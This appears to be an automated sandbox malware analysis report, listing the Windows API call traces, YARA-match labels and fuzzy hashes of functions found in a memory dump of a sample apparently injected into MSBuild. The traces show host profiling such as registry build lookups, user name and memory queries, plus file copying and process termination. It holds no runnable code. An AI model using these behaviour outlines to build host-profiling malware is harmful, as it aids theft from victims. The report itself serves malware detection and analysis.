                                                                                          • Part of subcall function 0040FA60: RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 0040FAB5
                                                                                          • Part of subcall function 0040FA60: RegCloseKey.ADVAPI32(?), ref: 0040FABF
                                                                                        • RegOpenKeyExA.KERNEL32(80000002,01690838,00000000,00020119,00000000), ref: 004105F1
                                                                                        • RegQueryValueExA.KERNEL32(00000000,0169A710,00000000,00000000,00000000,000000FF), ref: 0041060C
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00410616
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                        • String ID: Windows 11
                                                                                        • API String ID: 3466090806-2517555085
                                                                                        • Opcode ID: a47b1fee11c922904502344837a3ea91d47d8b4281bde6fd73d92917b4b8e5ca
                                                                                        • Instruction ID: 6a00dca0351ba1f1b5825a2528416373370fab3b8fd5f0a2b799655d5a0aabf6
                                                                                        • Opcode Fuzzy Hash: a47b1fee11c922904502344837a3ea91d47d8b4281bde6fd73d92917b4b8e5ca
                                                                                        • Instruction Fuzzy Hash: 1201D67160020CBBD710EBA4EC49EBB777EEB44305F00516AFA09D7250D7B499808BE0
                                                                                        Function 0040FA60 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40registrymemoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 0040FA75
                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0040FA7C
                                                                                        • RegOpenKeyExA.KERNEL32(80000002,01690838,00000000,00020119,?), ref: 0040FA9B
                                                                                        • RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 0040FAB5
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0040FABF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                        • String ID: CurrentBuildNumber
                                                                                        • API String ID: 3466090806-1022791448
                                                                                        • Opcode ID: 7b7d1b79e19f05ca12c8064292c75d5cc37a930701fe9e474d57c854d10d4e52
                                                                                        • Instruction ID: a1553181ab18edaa3b94d53bb79d7bf4b62666c9831d6ad32faf63d23f73e213
                                                                                        • Opcode Fuzzy Hash: 7b7d1b79e19f05ca12c8064292c75d5cc37a930701fe9e474d57c854d10d4e52
                                                                                        • Instruction Fuzzy Hash: 98F062B5A41318BBD710ABE0AC0AFAB7B7DEB44755F002169FB05A6181D7B45A4087E1
                                                                                        Function 0040FED0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,TimeZone: ,00000000,?,00423408,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,00423408), ref: 0040FEDE
                                                                                        • HeapAlloc.KERNEL32(00000000,?,TimeZone: ,00000000,?,00423408,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,00423408,00000000), ref: 0040FEE5
                                                                                        • GlobalMemoryStatusEx.KERNEL32(?,?,00000000,00000040), ref: 0040FF05
                                                                                        • wsprintfA.USER32 ref: 0040FF2B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
                                                                                        • String ID: %d MB$@
                                                                                        • API String ID: 3644086013-3474575989
                                                                                        • Opcode ID: c91f0ec11f474d8c1381f109a4bcd534d4041cf4b5121d99c497be17c465c294
                                                                                        • Instruction ID: af9ca1c618701aaf6e1e57e94b25e62574dec66522ec45beacafd1b49d2b4fa6
                                                                                        • Opcode Fuzzy Hash: c91f0ec11f474d8c1381f109a4bcd534d4041cf4b5121d99c497be17c465c294
                                                                                        • Instruction Fuzzy Hash: ACF062B1A40218ABE714ABA4DC0AFBE77ADFB01345F401129F706E61C0D7B89C0187E5
                                                                                        Function 004158B0 Relevance: 9.1, APIs: 6, Instructions: 130registrystringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 004158D5
                                                                                        • RegOpenKeyExA.KERNEL32(80000001,01699CE8,00000000,00020119,?), ref: 004158F4
                                                                                        • RegQueryValueExA.ADVAPI32(?,0169A878,00000000,00000000,00000000,000000FF), ref: 00415918
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00415922
                                                                                        • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00415947
                                                                                        • lstrcatA.KERNEL32(?,0169A818), ref: 0041595B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcat$CloseOpenQueryValuememset
                                                                                        • String ID:
                                                                                        • API String ID: 2623679115-0
                                                                                        • Opcode ID: 9d24550046d12cef6d6a8430f06f5fcf17270119dd68565c0f59e3130cccedf6
                                                                                        • Instruction ID: b2658f5a2186259637989032082ab400ffc55dd45aba0fd3878622be2ef6c76c
                                                                                        • Opcode Fuzzy Hash: 9d24550046d12cef6d6a8430f06f5fcf17270119dd68565c0f59e3130cccedf6
                                                                                        • Instruction Fuzzy Hash: BD41A3B5900208ABCF24EFA1CC46FDE3739AB85304F40865DFA5566191DB746AC8CFE5
                                                                                        Function 00406C20 Relevance: 9.1, APIs: 6, Instructions: 71filememoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,0040BA32,?,00000000,?,00000000,00000000), ref: 00406C3F
                                                                                        • GetFileSizeEx.KERNEL32(00000000,?,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C55
                                                                                        • LocalAlloc.KERNEL32(00000040,?,?,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C70
                                                                                        • ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C89
                                                                                        • LocalFree.KERNEL32(?,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406CA9
                                                                                        • CloseHandle.KERNEL32(00000000,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406CB1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                        • String ID:
                                                                                        • API String ID: 2311089104-0
                                                                                        • Opcode ID: f92c717aaf7597c66bfacc60d54a838b8fdc52d17d646df18638fdf46865ad5a
                                                                                        • Instruction ID: 5b08f293fa4d369547e293c080fd62cfee42250c67ac5e0144c02d8e3dd3972c
                                                                                        • Opcode Fuzzy Hash: f92c717aaf7597c66bfacc60d54a838b8fdc52d17d646df18638fdf46865ad5a
                                                                                        • Instruction Fuzzy Hash: B011AF71604209AFEB10DF64DC85EBB77BEEB80344F10513EFA42A7290DB389D518BA4
                                                                                        Function 004175F0 Relevance: 9.1, APIs: 6, Instructions: 67COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 004176E0: GetProcAddress.KERNEL32(74DD0000,0168AA20), ref: 00417748
                                                                                          • Part of subcall function 004176E0: GetProcAddress.KERNEL32(74DD0000,0168AB10), ref: 00417761
                                                                                          • Part of subcall function 004176E0: GetProcAddress.KERNEL32(74DD0000,0168AB28), ref: 00417779
                                                                                          • Part of subcall function 004176E0: GetProcAddress.KERNEL32(74DD0000,0168A930), ref: 00417791
                                                                                          • Part of subcall function 004176E0: GetProcAddress.KERNEL32(74DD0000,0168EE38), ref: 004177AA
                                                                                          • Part of subcall function 004176E0: GetProcAddress.KERNEL32(74DD0000,01696630), ref: 004177C2
                                                                                          • Part of subcall function 004176E0: GetProcAddress.KERNEL32(74DD0000,01696610), ref: 004177DA
                                                                                          • Part of subcall function 004176E0: GetProcAddress.KERNEL32(74DD0000,0168A978), ref: 004177F3
                                                                                          • Part of subcall function 004176E0: GetProcAddress.KERNEL32(74DD0000,0168AAC8), ref: 0041780B
                                                                                          • Part of subcall function 004176E0: GetProcAddress.KERNEL32(74DD0000,0168AA50), ref: 00417823
                                                                                          • Part of subcall function 004176E0: GetProcAddress.KERNEL32(74DD0000,0168AA68), ref: 0041783C
                                                                                          • Part of subcall function 004176E0: GetProcAddress.KERNEL32(74DD0000,016964F0), ref: 00417854
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                          • Part of subcall function 0040FAE0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00417612,004201E9), ref: 0040FAEC
                                                                                          • Part of subcall function 0040FAE0: HeapAlloc.KERNEL32(00000000,?,?,?,00417612,004201E9), ref: 0040FAF3
                                                                                          • Part of subcall function 0040FAE0: GetUserNameA.ADVAPI32(00000000,004201E9), ref: 0040FB07
                                                                                          • Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,0168EE78,?,00423414,?,00000000,004201E9), ref: 0040F9B9
                                                                                          • Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
                                                                                          • Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB
                                                                                          • Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930
                                                                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0168EE78,?,00423414,?,00000000,004201E9), ref: 00417672
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00417681
                                                                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000), ref: 00417697
                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004176B1
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004176BF
                                                                                        • ExitProcess.KERNEL32 ref: 004176C7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressProc$Eventlstrcpy$CloseHandleHeapOpenProcess$AllocCreateExitNameUserlstrcatlstrlen
                                                                                        • String ID:
                                                                                        • API String ID: 1749527509-0
                                                                                        • Opcode ID: 1bdeba99335991e6f9bdbcc5571e6edad701c08b7eb7378d217687897852acd7
                                                                                        • Instruction ID: 13c05977e48a492468067969b5632ac7cddf019cfab1cdc1380e7e7caaa560eb
                                                                                        • Opcode Fuzzy Hash: 1bdeba99335991e6f9bdbcc5571e6edad701c08b7eb7378d217687897852acd7
                                                                                        • Instruction Fuzzy Hash: 11213B71A001087BDB14FBB1DC56FEE7378AF10704F50513AB606B24D2EF786A088AA9
                                                                                        Function 00409690 Relevance: 7.8, APIs: 5, Instructions: 264fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                          • Part of subcall function 00410B80: GetSystemTime.KERNEL32(004201E9,0168FCC0,004201E9,?,00000030,004201E9,004201E9,?,00000000,?,?,004176BE), ref: 00410BA9
                                                                                          • Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,0168EE78,?,00423414,?,00000000,004201E9), ref: 0040F9B9
                                                                                          • Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
                                                                                          • Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB
                                                                                          • Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
                                                                                          • Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D
                                                                                          • Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930
                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040976A
                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00409734
                                                                                          • Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878
                                                                                          • Part of subcall function 004110F0: memset.MSVCRT ref: 0041110A
                                                                                          • Part of subcall function 004110F0: GetProcessHeap.KERNEL32(00000000,000000FA,00000000,00000000,?,00409753,00409C77), ref: 0041113D
                                                                                          • Part of subcall function 004110F0: HeapAlloc.KERNEL32(00000000,?,00409753,00409C77), ref: 00411144
                                                                                          • Part of subcall function 004110F0: wsprintfW.USER32 ref: 00411153
                                                                                          • Part of subcall function 004110F0: OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 004111BB
                                                                                          • Part of subcall function 004110F0: TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 004111CA
                                                                                          • Part of subcall function 004110F0: CloseHandle.KERNEL32(00000000,?,?), ref: 004111D1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcpy$Process$CopyFileHeaplstrcat$AllocCloseHandleOpenSystemTerminateTimelstrlenmemsetwsprintf
                                                                                        • String ID:
                                                                                        • API String ID: 3536976966-0
                                                                                        • Opcode ID: 48038416943861244995db3fe22c3c07c1ac8d57abec220332203bf17e321ea3
                                                                                        • Instruction ID: 59642c9a9299a7c4d39bed30f6b85666f3aa0001a0dfc23d3a4e96657f843de5
                                                                                        • Opcode Fuzzy Hash: 48038416943861244995db3fe22c3c07c1ac8d57abec220332203bf17e321ea3
                                                                                        • Instruction Fuzzy Hash: 8491EB72910108ABCB14FBA1DC56DEE7379AF54304F50813EF506B65E2EF386A0DCA69
                                                                                        Function 00419FE0 Relevance: 7.6, APIs: 5, Instructions: 134fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,00000030,?,0041B1A9,?,?,?,00000000), ref: 0041A035
                                                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,0041B1A9,00000080,00000000,00000000,00000030,?,0041B1A9,?,?,?,00000000), ref: 0041A06F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$CreatePointer
                                                                                        • String ID:
                                                                                        • API String ID: 2024441833-0
                                                                                        • Opcode ID: 772bf794a0539b62a801477fbb62bcb276aa9b4d2b65757f9edafb53a070daec
                                                                                        • Instruction ID: ed9b1ade8afe9e764bcb327c8eb7a8881111bfc1a91da69b80f20d04efd87e30
                                                                                        • Opcode Fuzzy Hash: 772bf794a0539b62a801477fbb62bcb276aa9b4d2b65757f9edafb53a070daec
                                                                                        • Instruction Fuzzy Hash: 10419472505704AFE7309F28A8C0BA7BBD8E754328F108A2FF159C6641D275DCD48B69
                                                                                        Function 6C57C930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetSystemInfo.KERNEL32(?), ref: 6C57C947
                                                                                        • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C57C969
                                                                                        • GetSystemInfo.KERNEL32(?), ref: 6C57C9A9
                                                                                        • VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C57C9C8
                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C57C9E2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2382968484.000000006C561000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C560000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2382937491.000000006C560000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2383501124.000000006C5DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2383594395.000000006C5EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2383635275.000000006C5F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c560000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Virtual$AllocInfoSystem$Free
                                                                                        • String ID:
                                                                                        • API String ID: 4191843772-0
                                                                                        • Opcode ID: 4b2ddb7b85e140370599d71ccc26e1fa0834c1e943105370711dbe12e60bcd4d
                                                                                        • Instruction ID: f150fbe94d8c1e832a2ab845f3b7c344a1ed1b28baa67eae20739e333a8acc35
                                                                                        • Opcode Fuzzy Hash: 4b2ddb7b85e140370599d71ccc26e1fa0834c1e943105370711dbe12e60bcd4d
                                                                                        • Instruction Fuzzy Hash: 1621FC31741318ABDB94AE64DC84BAE777AAF8A704F510519F903A7740EB707C4087A9
                                                                                        Function 00410630 Relevance: 7.6, APIs: 5, Instructions: 82commemoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CoCreateInstance.OLE32(00424770,00000000,00000001,004238C4,00410847,00000000,00000000,00000030,00410847,00000030,?,00000001,?,00000030,00000000,00000000), ref: 0041066D
                                                                                        • SysAllocString.OLEAUT32(?), ref: 0041067B
                                                                                        • _wtoi64.MSVCRT ref: 004106BA
                                                                                        • SysFreeString.OLEAUT32(?), ref: 004106D9
                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 004106E0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
